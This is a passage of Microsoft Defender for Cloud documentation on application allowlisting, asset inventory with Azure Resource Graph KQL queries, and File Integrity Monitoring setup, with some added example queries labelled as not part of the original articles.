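            f"/locations/{asc_location}/applicationWhitelistings/{group_name}"
            "?api-version=2020-01-01")


if __name__ == "__main__":
    body = to_put_body(SAMPLE_GET)
    print("still disallowed:", leftover_disallowed(body))   # expected: []
    print("PUT", put_url("<subscriptionId>", "centralus", body["name"]))
```

Running `leftover_disallowed` on the original response shows all five properties, and on the converted body none; checking it before every Put is a cheap guard against a Get response that grows a property the list does not yet cover.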


Next steps 


On this page, you learned how to use adaptive application control in Microsoft Defender 
for Cloud to define allowlists of applications running on your Azure and non-Azure 
machines. To learn more about some other cloud workload protection features, see: 


• Understanding just-in-time (JIT) VM access
• Securing your Azure Kubernetes clusters
• View common questions about Adaptive application controls


Use asset inventory to manage your 
resources’ security posture 


Article • 06/19/2023


The asset inventory page of Microsoft Defender for Cloud shows the security posture of 
the resources you've connected to Defender for Cloud. Defender for Cloud periodically 
analyzes the security state of resources connected to your subscriptions to identify 
potential security issues and provides you with active recommendations. Active 
recommendations are recommendations that can be resolved to improve your security 
posture. 


Use this view and its filters to address such questions as: 


• Which of my subscriptions with Defender plans enabled have outstanding recommendations?

• Which of my machines with the tag 'Production' are missing the Log Analytics agent?

• How many of my machines tagged with a specific tag have outstanding recommendations?

• Which machines in a specific resource group have a known vulnerability (using a CVE number)?


The security recommendations on the asset inventory page are also shown in the 
Recommendations page, but here they're shown according to the affected resource. 


Learn more about implementing security recommendations. 


Availability 


Aspect | Details

Release state: General availability (GA)

Pricing: Free. Some features of the inventory page, such as the software inventory, require paid solutions to be in place.

Required roles and permissions: All users

Clouds: ✔ Commercial clouds; ✔ National (Azure Government, Azure China 21Vianet). Software inventory isn't currently supported in national clouds.


What are the key features of asset inventory? 


The inventory page provides the following tools: 


[Screenshot: Microsoft Defender for Cloud | Inventory page, with (1) the summary strip (Total Resources, Unhealthy Resources, Unmonitored Resources, Unregistered subscriptions), (2) the filters (Subscriptions, Resource Groups, Resource types, Defender for Cloud, Monitoring agent, Environment, Recommendations, Installed applications), and (3) the toolbar (Refresh, Add non-Azure servers, Open query, Download CSV report) above the resource list]

1 - Summaries 


Before you define any filters, a prominent strip of values at the top of the inventory view 
shows: 


• Total resources: The total number of resources connected to Defender for Cloud.

• Unhealthy resources: Resources with active security recommendations that you can implement. Learn more about implementing security recommendations.

• Unmonitored resources: Resources with agent monitoring issues - they have the Log Analytics agent deployed, but the agent isn't sending data or has other health issues.

• Unregistered subscriptions: Any subscription in the selected scope that hasn't yet been connected to Microsoft Defender for Cloud.


2 - Filters 


The multiple filters at the top of the page provide a way to quickly refine the list of resources according to the question you're trying to answer. For example, if you wanted to know which of your machines with the tag 'Production' are missing the Log Analytics agent, you can filter the list for Agent monitoring:"Not installed" and Tags:"Production".

As soon as you've applied filters, the summary values are updated to relate to the query results.


3 - Export and asset management tools 


Export options - Inventory includes an option to export the results of your selected filter 
options to a CSV file. You can also export the query itself to Azure Resource Graph 
Explorer to further refine, save, or modify the Kusto Query Language (KQL) query. 


Q Tip 


The KQL documentation provides a database with some sample data together with 
some simple queries to get the "feel" for the language. Learn more in this KQL 
tutorial. 


Asset management options - When you've found the resources that match your 
queries, inventory provides shortcuts for operations such as: 


• Assign tags to the filtered resources - select the checkboxes alongside the resources you want to tag.

• Onboard new servers to Defender for Cloud - use the Add non-Azure servers toolbar button.

• Automate workloads with Azure Logic Apps - use the Trigger Logic App button to run a logic app on one or more resources. Your logic apps have to be prepared in advance, and accept the relevant trigger type (HTTP request). Learn more about logic apps.


How does asset inventory work? 


Asset inventory utilizes Azure Resource Graph (ARG), an Azure service that lets you 
query Defender for Cloud's security posture data across multiple subscriptions. 


ARG is designed to provide efficient resource exploration with the ability to query at 
scale. 


You can use Kusto Query Language (KQL) in the asset inventory to quickly produce deep 
insights by cross-referencing Defender for Cloud data with other resource properties. 


How to use asset inventory 


1. From Defender for Cloud's sidebar, select Inventory. 


2. Use the Filter by name box to display a specific resource, or use the filters to focus 
on specific resources. 


By default, the resources are sorted by the number of active security 
recommendations. 
Important


The options in each filter are specific to the resources in the currently selected 
subscriptions and your selections in the other filters. 


For example, if you've selected only one subscription, and the subscription 
has no resources with outstanding security recommendations to remediate (0 
unhealthy resources), the Recommendations filter will have no options. 


[Screenshot: Inventory page with filters applied, showing the summary strip and the filtered resource list]


3. To use the Security findings contain filter, enter free text from the ID, security 
check, or CVE name of a vulnerability finding to filter to the affected resources: 


[Screenshot: Details of the recommendation "Vulnerabilities in Azure Container Registry images should be remediated", showing the security check 176875 "Debian Security Update for systemd" (CVE-2018-1049 and CVE-2018-15686, severity High, CVSS 3.0 base score 9.8, patchable) with its remediation links and the list of related Debian security update findings and the scanned images they affect]

Tip


The Security findings contain and Tags filters only accept a single value. To 
filter by more than one, use Add filters. 


4. To use the Defender for Cloud filter, select one or more options (Off, On, or 
Partial): 


• Off - Resources not protected by a Microsoft Defender plan. You can right-click on the resources and upgrade them:

  [Screenshot: Inventory list with a virtual machine's context menu open, showing View resource and Upgrade]

• On - Resources protected by a Microsoft Defender plan

• Partial - Subscriptions with some but not all of the Microsoft Defender plans disabled. For example, the following subscription has seven Microsoft Defender plans disabled.

  [Screenshot: Settings | Defender plans page for the subscription Contoso Infra2 with Enhanced security off, listing the plans by resource type (Servers, App Service, Azure SQL Databases, SQL servers on machines, Open-source relational databases, Storage, Kubernetes, Container registries, Key Vault, Resource Manager, DNS) with their quantity, pricing and On/Off toggles]


5. To further examine the results of your query, select the resources that interest you. 


6. To view the current selected filter options as a query in Resource Graph Explorer, 
select Open query. 


[Screenshot: Azure Resource Graph Explorer showing the current inventory filter as a KQL query. The visible part of the query reads:]

securityresources
| where type =~ "microsoft.security/assessments"
| extend assessmentStatusCode = tostring(properties.status.code)
| extend severity = case(assessmentStatusCode =~ "unhealthy", tolower(tostring(properties.metadata.severity)), tolower(assessmentStatusCode))
| extend source = tostring(properties.resourceDetails.Source)
| extend resourceId = trim(" ", tolower(tostring(case(source =~ "azure", properties.resourceDetails.Id,
    source =~ "aws", properties.additionalData.AzureResourceId,
    source =~ "gcp", properties.additionalData.AzureResourceId,
    extract("^(.+)/providers/Microsoft.Security/assessments/.+$", 1,
    // the rest of the query is cut off in the screenshot


7. If you've defined some filters and left the page open, Defender for Cloud won't 
update the results automatically. Any changes to resources won't impact the 
displayed results unless you manually reload the page or select Refresh. 


Access a software inventory 


To access the software inventory, you'll need one of the following paid solutions: 


e Agentless machine scanning from Defender Cloud Security Posture Management 
(CSPM). 

e Agentless machine scanning from Defender for Servers P2. 

e Microsoft Defender for Endpoint integration from Defender for Servers. 


If you've already enabled the integration with Microsoft Defender for Endpoint and 
enabled Microsoft Defender for Servers, you'll have access to the software inventory. 


[Screenshot: the Inventory page (64 subscriptions) with the filter Installed applications == All added next to the Subscriptions, Resource Groups, Defender for Cloud, and Environment filters. The summary shows Total Resources 65748, Unhealthy Resources 3007, Unmonitored Resources 0, and Unregistered subscriptions 0. The table columns are Resource name, Resource type, Subscription, Monitoring agent (Installed / Not installed), Defender for Cloud (On), and Recommendations.]


Note

The "Blank" option shows machines without Microsoft Defender for Endpoint or without Microsoft Defender for Servers.

Besides the filters in the asset inventory page, you can explore the software inventory data from Azure Resource Graph Explorer.


Examples of using Azure Resource Graph Explorer to access and explore software 
inventory data: 


1. Open Azure Resource Graph Explorer. 



2. Select the following subscription scope: securityresources/softwareinventories 


3. Enter any of the following queries (or customize them or write your own!) and 
select Run query. 


- To generate a basic list of installed software:

Kusto

securityresources
| where type == "microsoft.security/softwareinventories"
| project id, Vendor=properties.vendor, Software=properties.softwareName, Version=properties.version


- To filter by version numbers:

Kusto

securityresources
| where type == "microsoft.security/softwareinventories"
| project id, Vendor=properties.vendor, Software=properties.softwareName, Version=tostring(properties.version)
| where Software=="windows_server_2019" and parse_version(Version)<=parse_version("10.0.17763.1999")


- To find machines with a combination of software products:

Kusto

securityresources
| where type == "microsoft.security/softwareinventories"
| extend vmId = properties.azureVmId
| where properties.softwareName == "apache_http_server" or properties.softwareName == "mysql"
| summarize count() by tostring(vmId)
| where count_ > 1


- Combination of a software product with another security recommendation (in this example, machines that have MySQL installed and exposed management ports):

Kusto

securityresources
| where type == "microsoft.security/softwareinventories"
| extend vmId = tolower(properties.azureVmId)
| where properties.softwareName == "mysql"
| join (
    securityresources
    | where type == "microsoft.security/assessments"
    | where properties.displayName == "Management ports should be closed on your virtual machines" and properties.status.code == "Unhealthy"
    | extend vmId = tolower(properties.resourceDetails.Id)
) on vmId
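The query below is an added example and is not part of the original article. It combines the version filter and the recommendation join shown above into one hunt: several products are checked against a minimum acceptable build in a single pass, every hit is joined to the open (Unhealthy) recommendations on the same machine, and machines that also have exposed management ports sort to the top. The softwareName values other than windows_server_2019, the minimum versions, and the use of properties.azureVmId as the join key are assumptions for illustration; confirm the exact names against the basic inventory list before relying on the output, and note that Azure Resource Graph supports only a subset of KQL.

```kusto
// Added example, not from the original article. Run it in Azure Resource
// Graph Explorer. The softwareName strings and minimum versions other than
// the windows_server_2019 one from the article are assumptions; confirm the
// exact names against the basic inventory list before relying on the output.
securityresources
| where type == "microsoft.security/softwareinventories"
| extend vmId = tolower(tostring(properties.azureVmId)),
         Vendor = tostring(properties.vendor),
         Software = tostring(properties.softwareName),
         Version = tostring(properties.version)
// Minimum acceptable build per product; rows below it are findings.
| extend MinimumVersion = case(
    Software == "windows_server_2019", "10.0.17763.1999",
    Software == "openssl", "3.0.7",
    Software == "mysql", "8.0.32",
    "")
| where isnotempty(MinimumVersion)
| where parse_version(Version) < parse_version(MinimumVersion)
| summarize Findings = make_set(strcat(Vendor, ":", Software, " ", Version)) by vmId
// Attach every open (Unhealthy) recommendation on the same machine and
// count the one the article's own example uses: exposed management ports.
| join kind=leftouter (
    securityresources
    | where type == "microsoft.security/assessments"
    | where tostring(properties.status.code) == "Unhealthy"
    | extend vmId = tolower(tostring(properties.resourceDetails.Id)),
             Recommendation = tostring(properties.displayName)
    | summarize OpenRecommendations = make_set(Recommendation),
                ExposedPorts = countif(Recommendation == "Management ports should be closed on your virtual machines")
        by vmId
) on vmId
| extend ExposedPorts = coalesce(ExposedPorts, 0)
| extend Exposed = ExposedPorts > 0
| project vmId, Exposed, Findings, OpenRecommendations
| order by ExposedPorts desc, array_length(Findings) desc
```

A machine with no open recommendations still appears (the join is leftouter), so the result is a complete list of stale builds, ordered by how reachable the host is rather than by when the inventory row was written.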


Next steps 


This article described the asset inventory page of Microsoft Defender for Cloud. 
For more information on related tools, see the following pages: 


- Azure Resource Graph (ARG)
- Kusto Query Language (KQL)
- View common questions about asset inventory


Enable File Integrity Monitoring when using the Azure Monitor Agent

Article • 08/30/2023


To provide File Integrity Monitoring (FIM), the Azure Monitor Agent (AMA) collects data 
from machines according to data collection rules. When the current state of your system 
files is compared with the state during the previous scan, FIM notifies you about 
suspicious modifications. 


Note

As part of Defender for Cloud's updated strategy, the Azure Monitor Agent will no longer be required to receive all the capabilities of Defender for Servers. All features that currently rely on the Azure Monitor Agent, including those described on this page, will be available through Microsoft Defender for Endpoint integration or agentless scanning by August 2024. To access the full capabilities of Defender for SQL servers on machines, the Azure Monitor Agent (AMA) is still required. For more information about the feature road map, see this announcement.


File Integrity Monitoring with the Azure Monitor Agent offers:

- Compatibility with the unified monitoring agent - Compatible with the Azure Monitor Agent, which enhances security and reliability and facilitates a multi-homing experience for storing data.
- Compatibility with the tracking tool - Compatible with the Change Tracking (CT) extension deployed through Azure Policy on the client's virtual machine. You can switch to the Azure Monitor Agent (AMA), and the CT extension then pushes the software, file, and registry data to AMA.
- Simplified onboarding - You can onboard FIM from Microsoft Defender for Cloud.
- Multi-homing experience - Provides standardization of management from one central workspace. You can transition from the Log Analytics (LA) agent to AMA so that all VMs point to a single workspace for data collection and maintenance.
- Rules management - Uses Data Collection Rules to configure or customize various aspects of data collection. For example, you can change the frequency of file collection.


In this article you'll learn how to:

- Enable File Integrity Monitoring with AMA
- Edit the list of tracked files and registry keys
- Exclude machines from File Integrity Monitoring


Availability

Release state: Preview
Pricing: Requires Microsoft Defender for Servers Plan 2
Required roles and permissions: Owner and Contributor
Clouds:
- Commercial clouds: supported, only in these regions: australiaeast, australiasoutheast, canadacentral, centralindia, centralus, eastasia, eastus2euap, eastus, eastus2, francecentral, japaneast, koreacentral, northcentralus, northeurope, southcentralus, southeastasia, switzerlandnorth, uksouth, westcentralus, westeurope, westus, westus2
- National clouds (Azure Government, Microsoft Azure operated by 21Vianet): not supported
- Azure Arc enabled devices: supported
- Connected AWS accounts: supported
- Connected GCP accounts: not supported

Prerequisites


To track changes to your files on machines with AMA:

- Enable Defender for Servers Plan 2
- Install AMA on the machines that you want to monitor


Enable File Integrity Monitoring with AMA 


To enable File Integrity Monitoring (FIM), use the FIM recommendation to select machines to monitor:

1. From Defender for Cloud's sidebar, open the Recommendations page.

2. Select the recommendation File integrity monitoring should be enabled on machines. Learn more about Defender for Cloud recommendations.

3. Select the machines that you want to use File Integrity Monitoring on, select Fix, and select Fix X resources.

   The recommendation fix:

   - Installs the ChangeTracking-Windows or ChangeTracking-Linux extension on the machines.
   - Generates a data collection rule (DCR) for the subscription, named Microsoft-ChangeTracking-[subscriptionId]-default-dcr, that defines which files and registry keys should be monitored based on default settings. The fix attaches the DCR to all machines in the subscription that have AMA installed and FIM enabled.
   - Creates a new Log Analytics workspace with the naming convention defaultWorkspace-[subscriptionId]-fim and with the default workspace settings.

   You can update the DCR and Log Analytics workspace settings later.


4. From Defender for Cloud's sidebar, go to Workload protections > File integrity monitoring, and select the banner to show the results for machines with Azure Monitor Agent.

   [Screenshot: Workload protections > File Integrity Monitoring, with the banner "This page displays results for machines with Log Analytics agent. To view the results for machines with Azure Monitoring Agent..." at the top.]

5. The machines with File Integrity Monitoring enabled are shown.

   [Screenshot: Workload protections > File Integrity Monitoring listing the monitored machines.]

   You can see the number of changes that were made to the tracked files, and you can select View changes to see the changes made to the tracked files on that machine.
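After running the fix, a practitioner usually wants to confirm which machines it actually reached, because the DCR is only attached to machines that already have AMA installed. The following Azure Resource Graph query is an added example and not part of the original article: it lists every Azure VM and Arc machine and reports whether the two extensions FIM with AMA depends on are provisioned, the Azure Monitor Agent (the prerequisite above) and the ChangeTracking-Windows or ChangeTracking-Linux extension that the recommendation fix installs. The AMA extension type names (AzureMonitorWindowsAgent and AzureMonitorLinuxAgent) and the use of properties.provisioningState are assumptions about the extension resource schema; verify them against an extension resource in your own tenant.

```kusto
// Added example, not from the original article. Run it in Azure Resource
// Graph Explorer. It reports, per Azure VM and Arc machine, whether the two
// extensions FIM with AMA depends on are provisioned: the Azure Monitor
// Agent (prerequisite) and the ChangeTracking extension that the
// recommendation fix installs. The AMA extension type names are assumed.
resources
| where type in~ ("microsoft.compute/virtualmachines", "microsoft.hybridcompute/machines")
| project machineId = tolower(id), name, subscriptionId
| join kind=leftouter (
    resources
    | where type in~ ("microsoft.compute/virtualmachines/extensions",
                      "microsoft.hybridcompute/machines/extensions")
    // The extension id is "<machine id>/extensions/<name>"; strip the suffix.
    | extend machineId = tolower(substring(id, 0, indexof(id, "/extensions/"))),
             extType = tostring(properties.type),
             state = tostring(properties.provisioningState)
    | where extType in ("AzureMonitorWindowsAgent", "AzureMonitorLinuxAgent",
                        "ChangeTracking-Windows", "ChangeTracking-Linux")
    | summarize AmaOk = countif(extType startswith "AzureMonitor" and state =~ "Succeeded"),
                CtOk = countif(extType startswith "ChangeTracking" and state =~ "Succeeded")
        by machineId
) on machineId
// Machines with neither extension come back null from the leftouter join.
| extend AmaOk = coalesce(AmaOk, 0), CtOk = coalesce(CtOk, 0)
| extend FimState = case(
    AmaOk > 0 and CtOk > 0, "Ready: AMA and ChangeTracking extension present",
    AmaOk > 0, "AMA only: run the FIM recommendation fix",
    "AMA missing: install AMA before enabling FIM")
| project name, subscriptionId, FimState, machineId
| order by FimState asc, name asc
```

Machines in the "AMA only" state are the ones the fix silently skipped or that were added after it ran; machines in the "AMA missing" state fail the prerequisite and need AMA first. A machine listed as Ready still only reports changes once the DCR is attached, so treat this as a coverage check, not proof that data is flowing.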


Edit the list of tracked files and registry keys 


File Integrity Monitoring (FIM) for machines with Azure Monitor Agent uses Data Collection Rules (DCRs) to define the list of files and registry keys to track. Each subscription has a DCR for the machines in that subscription.

FIM creates DCRs with a default configuration of tracked files and registry keys. You can edit the DCRs to add, remove, or update the list of files and registry keys that are tracked by FIM.


To edit the list of tracked files and registry keys:

1. In File integrity monitoring, select Data collection rules.

   You can see each of the rules that were created for the subscriptions that you have access to.

2. Select the DCR that you want to update for a subscription.

   Each entry in the lists of Windows registry keys, Windows files, and Linux files contains a definition for a file or registry key, including name, path, and other options. You can also set Enabled to False to stop tracking the file or registry key without removing the definition.

   Learn more about system file and registry key definitions.

3. Select a file, and then add or edit the file or registry key definition.

4. Select Add to save the changes.


Exclude machines from File Integrity 
Monitoring 


Every machine in the subscription that is attached to the DCR is monitored. You can detach a machine from the DCR so that its files and registry keys aren't tracked.

To exclude a machine from File Integrity Monitoring:

1. In the list of monitored machines in the FIM results, select the menu (...) for the machine.

2. Select Detach data collection rule.

   [Screenshot: the machine's context menu with the Detach data collection rule option.]

The machine moves to the list of unmonitored machines, and file changes aren't tracked for that machine anymore.


Next steps

Learn more about Defender for Cloud in:

- Setting security policies - Learn how to configure security policies for your Azure subscriptions and resource groups.
- Managing security recommendations - Learn how recommendations help you protect your Azure resources.
- Azure Security blog - Get the latest Azure security news and information.


File Integrity Monitoring using the Log Analytics agent

Article • 05/10/2023


To provide File Integrity Monitoring (FIM), the Log Analytics agent uploads data to the 
Log Analytics workspace. By comparing the current state of these items with the state 
during the previous scan, FIM notifies you if suspicious modifications have been made. 


Note

As the Log Analytics agent (also known as MMA) is set to retire in August 2024, all Defender for Servers features that currently depend on it, including those described on this page, will be available through either Microsoft Defender for Endpoint integration or agentless scanning before the retirement date. For more information about the roadmap for each of the features that currently rely on the Log Analytics agent, see this announcement.


In this article, you'll learn how to:

- Enable File Integrity Monitoring with the Log Analytics agent
- Disable File Integrity Monitoring
- Monitor workspaces, entities, and files
- Compare baselines using File Integrity Monitoring

Note

File Integrity Monitoring may create the following account on monitored SQL Servers: NT Service\HealthService

If you delete the account, it will be automatically recreated.


Availability

Release state: General availability (GA)
Pricing: Requires Microsoft Defender for Servers Plan 2. Using the Log Analytics agent, FIM uploads data to the Log Analytics workspace. Data charges apply, based on the amount of data you upload. See Log Analytics pricing to learn more.
Required roles and permissions: Workspace owner can enable/disable FIM (for more information, see Azure Roles for Log Analytics). Reader can view results.
Clouds:
- Commercial clouds: supported
- National clouds (Azure Government, Microsoft Azure operated by 21Vianet): not supported
- Supported only in regions where Azure Automation's change tracking solution is available. See Supported regions for linked Log Analytics workspace. Learn more about change tracking.
- Azure Arc enabled devices: supported
- Connected AWS accounts: not supported


Enable File Integrity Monitoring with the Log 
Analytics agent 


FIM is only available from Defender for Cloud's pages in the Azure portal. There's 
currently no REST API for working with FIM. 


1. From the Workload protections dashboard's Advanced protection area, select File 
integrity monitoring. 


[Screenshot: the Workload protections dashboard (73 subscriptions). The Defender for Cloud coverage area shows per-resource-type coverage (Servers, Kubernetes, Container registries, App Service, Key Vault, Azure SQL databases, Storage, Resource Manager, DNS) with Fully covered (93%), Agent not installed (3.7%), and Not covered (3.3%). The Advanced protection area shows tiles for VM vulnerability assessment (149 unprotected), Just-in-time VM access (15 unprotected), Adaptive application control (50 unprotected), Container image scanning (8 unprotected), Adaptive network hardening (14 unprotected), SQL vulnerability assessment, File integrity monitoring (10 unprotected), Network map, and IoT security.]


The following information is provided for each workspace:

- Total number of changes that occurred in the last week (you may see a dash if FIM isn't enabled on the workspace)
- Total number of computers and VMs reporting to the workspace
- Geographic location of the workspace
- Azure subscription that the workspace is under


2. Use this page to:

   - Access and view the status and settings of each workspace.
   - Upgrade the workspace to use enhanced security features. This icon indicates that the workspace or subscription isn't protected with Microsoft Defender for Servers. To use the FIM features, your subscription must be protected with this plan. Learn about how to enable Defender for Servers.
   - Enable FIM on all machines under the workspace and configure the FIM options. This icon indicates that FIM isn't enabled for the workspace.

   If there's no enable or upgrade button, and the space is blank, it means that FIM is already enabled on the workspace.
[Screenshot: the File Integrity Monitoring page ("Choose a workspace to view its File Integrity Monitoring dashboard") with columns Workspace Name, Total changes, Total servers, Location, and Subscription. Sample rows: la-sh360-00edf (0, 0, East US, Contoso Dev_EUS), la-sh360-9472d (0, 0, East US, Contoso Dev_India), cha (1.1K, 318, East US, Contoso Hotels), ch-la-dev (546, 270, East US, Contoso Hotels - Dev), defaultworkspace-0ba... (0, 0, East US, Contoso Infra1), la-sh360-0ba67 (0, 0, East US, Contoso Infra1). Rows show an UPGRADE PLAN or ENABLE button where applicable.]


3. Select ENABLE. The details of the workspace, including the number of Windows and Linux machines under the workspace, are shown.


   [Screenshot: the Enable File Integrity Monitoring pane for the workspace defaultworkspace-04. It warns that enabling file integrity monitoring affects all machines connected to the selected workspace, shows 0 Windows servers and 4 Linux servers, and lists the Recommended settings groups Windows Files, Registry, and Linux Files. It notes that FIM uploads data to the Log Analytics workspace and that data charges apply based on the amount of data uploaded, that the selected settings can be modified later from the File Integrity Monitoring settings, and that FIM leverages the Change Tracking solution enabled on the workspace. The pane ends with an Enable File Integrity Monitoring button.]


The recommended settings for Windows and Linux are also listed. Expand 
Windows files, Registry, and Linux files to see the full list of recommended items. 


4. Clear the checkboxes for any recommended entities you don't want to be 
monitored by FIM. 


5. Select Apply file integrity monitoring to enable FIM. 


You can change the settings at any time. Learn more about editing monitored entities. 


Disable File Integrity Monitoring 


FIM uses the Azure Change Tracking solution to track and identify changes in your 
environment. By disabling FIM, you remove the Change Tracking solution from selected 
workspace. 


To disable FIM: 


1. From the File Integrity Monitoring dashboard for a workspace, select Disable. 


   [Screenshot: a workspace's File Integrity Monitoring dashboard with the toolbar Settings, Refresh, Filter, and Disable. Summary tiles show Total servers 8, Total changes 34, Change type (Files 0, Registry 34), and Change category (Modified 0, Added 17, Removed 17). The Servers tab lists each machine (for example vmtest, server16-test, and several vmss instances) with its total, file, and registry change counts and last change time.]


2. Select Remove. 


Monitor workspaces, entities, and files 


Audit monitored workspaces 


The File integrity monitoring dashboard displays for workspaces where FIM is enabled. 
The FIM dashboard opens after you enable FIM on a workspace or when you select a 
workspace in the file integrity monitoring window that already has FIM enabled. 


[Screenshot: the File Integrity Monitoring dashboard for a workspace, the same view as above: the Settings, Refresh, Filter, and Disable toolbar; the Total servers (8), Total changes (34), Change type, and Change category tiles; and the Servers tab.]


The FIM dashboard for a workspace displays the following details:

- Total number of machines connected to the workspace
- Total number of changes that occurred during the selected time period
- A breakdown of change type (files, registry)
- A breakdown of change category (modified, added, removed)

Select Filter at the top of the dashboard to change the time period for which changes are shown.


[Screenshot: the Filter pane on the FIM dashboard, with Time options Last 30 Minutes, Last 1 Hour, Last 6 Hours, Last 24 Hours, Last 7 Days (selected), and Last 30 Days.]


The Servers tab lists the machines reporting to this workspace. For each machine, the dashboard lists:

- Total changes that occurred during the selected period of time
- A breakdown of total changes as file changes or registry changes

When you select a machine, the query appears along with the results that identify the changes made during the selected time period for the machine. You can expand a change for more information.


[Screenshot: the Logs page opened for the selected machine, showing the query and 14 result rows from the ConfigurationChange table, all Registry changes (Added or Removed) under HKEY_LOCAL_MACHINE on the computer vmtest, with the columns TimeGenerated, Computer, ConfigChangeType, ChangeCategory, SourceComputerId, RegistryKey, Hive, and ValueName. The query shown is:]

Kusto

ConfigurationChange
| where Computer == "vmtest"
| where ConfigChangeType in ("Files", "Registry")
| order by TimeGenerated
| render table


The Changes tab (shown below) lists all changes for the workspace during the selected time period. For each entity that was changed, the dashboard lists the:

- Machine that the change occurred on
- Type of change (registry or file)
- Category of change (modified, added, removed)
- Date and time of change


[Screenshot: the Changes tab of the FIM dashboard (Total servers 8, Total changes 50, Files 20, Registry 48, Modified 2, Added 24, Removed 24) with columns Entity, Server, Type, Category, and Change time. The sample rows are Added and Removed registry changes under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist (values such as \REGISTRY\MACHINE\COMPONENTS and \REGISTRY\MACHINE\DRIVERS) on vmtest and server16-test between 04/24/21 and 04/25/21.]


Change details opens when you enter a change in the search field or select an entity listed under the Changes tab.


[Screenshot: the Changes tab with the banner "Presenting the latest 100 changes. Click here to view all changes in Log Analytics", a search box, and the Change details pane for a registry change to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist. The pane shows Value Before and Value After for the properties SourceComputerId, RegistryKey, Hive (HKEY_LOCAL_MACHINE), ValueName (\REGISTRY\MACHINE\COMPONENTS), ValueData (\Device\HarddiskVolume1\Windows\System32\config\COMPONENTS), ValueType (REG_SZ), Size (59), Acls (owner BUILTIN\Administrators, group NT ...), SourceSystem, MG, ManagementGroupName, TenantId, and VMUUID, with an option to show or hide unchanged properties.]

Edit monitored entities


1. From the File Integrity Monitoring dashboard for a workspace, select Settings from the toolbar.


   [Screenshot: the File Integrity Monitoring dashboard for a default workspace (5 servers, 0 changes), with the Settings button in the toolbar next to Refresh, Filter, and Disable.]


   Workspace Configuration opens with tabs for each type of element that can be monitored:

   - Windows registry
   - Windows files
   - Linux Files
   - File content
   - Windows services

   Each tab lists the entities that you can edit in that category. For each entity listed, Defender for Cloud identifies whether FIM is enabled (true) or not enabled (false). Edit the entity to enable or disable FIM.


   [Screenshot: Workspace Configuration (Change Tracking), Windows Registry tab, with an Add button and the columns Group, Enabled, Registry Key, and Recursive. Rows in the Recommended group (Enabled false, Recursive true) cover keys under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVer... and HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\...; rows in the Security group (Enabled true, Recursive false) cover keys under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID..., HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Curre..., and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentV... (key names are truncated in the screenshot).]


2. Select an entry from one of the tabs and edit any of the available fields in the Edit for Change Tracking pane. Options include:

   - Enable (True) or disable (False) file integrity monitoring
   - Provide or change the entity name
   - Provide or change the value or path
   - Delete the entity

3. Discard or save your changes.


Add a new entity to monitor 


1. From the File Integrity Monitoring dashboard for a workspace, select Settings from the toolbar.

   The Workspace Configuration opens.

2. On the Workspace Configuration:

   a. Select the tab for the type of entity that you want to add: Windows registry, Windows files, Linux Files, file content, or Windows services.

   b. Select Add.

   In this example, we selected Linux Files.

   [Screenshot: Workspace Configuration, Linux Files tab, with the columns Group, Enabled, Path, Type, Links, Recursive, Sudo, and Upload file. The recommended row reads: Recommended, true, /etc/*.conf, File, Follow, true, true, 100.]

3. Select Add. Add for Change Tracking opens.

4. Enter the necessary information and select Save.


Folder and path monitoring using wildcards 


Use wildcards to simplify tracking across directories. The following rules apply when you configure folder monitoring using wildcards:

- Wildcards are required for tracking multiple files.
- Wildcards can only be used in the last segment of a path, such as C:\folder\file or /etc/*.conf
- If an environment variable includes a path that isn't valid, validation succeeds but the path fails when inventory runs.
- When setting the path, avoid general paths such as c:\*.*, which results in too many folders being traversed.


Compare baselines using File Integrity 
Monitoring 


File Integrity Monitoring (FIM) informs you when changes occur to sensitive areas in your resources, so you can investigate and address unauthorized activity. FIM monitors Windows files, Windows registries, and Linux files.


Enable built-in recursive registry checks 


The FIM registry hive defaults provide a convenient way to monitor recursive changes 
within common security areas. For example, an adversary may configure a script to 
execute in LOCAL_SYSTEM context by configuring an execution at startup or shutdown. 
To monitor changes of this type, enable the built-in check. 


Group        Enabled  Registry key
Recommended  false    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown
Recommended  false    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup
Recommended  false    HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions

Note

Recursive checks apply only to recommended security hives and not to custom
registry paths.


Add a custom registry check 


FIM baselines start by identifying characteristics of a known-good state for the
operating system and supporting applications. For this example, we'll focus on the
machine account password and secure channel policies, stored under the Netlogon
service key, for Windows Server 2008 and higher.

Policy Name                                                                 Registry Setting
Domain controller: Refuse machine account password changes                  MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RefusePasswordChange
Domain member: Digitally encrypt or sign secure channel data (always)       MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal
Domain member: Digitally encrypt secure channel data (when possible)        MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\SealSecureChannel
Domain member: Digitally sign secure channel data (when possible)           MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\SignSecureChannel
Domain member: Disable machine account password changes                     MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange
Domain member: Maximum machine account password age                         MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\MaximumPasswordAge
Domain member: Require strong (Windows 2000 or later) session key           MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireStrongKey
Network security: Restrict NTLM: NTLM authentication in this domain         MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RestrictNTLMInDomain
Network security: Restrict NTLM: Add server exceptions in this domain       MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\DCAllowedNTLMServers
Network security: Restrict NTLM: Audit NTLM authentication in this domain   MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\AuditNTLMInDomain

Note

To learn more about registry settings supported by various operating system
versions, refer to the Group Policy Settings reference spreadsheet.


To configure FIM to monitor registry baselines: 


1. In the Add Windows Registry for Change Tracking window, select the Windows
Registry Key text box.

2. Enter the following registry key:

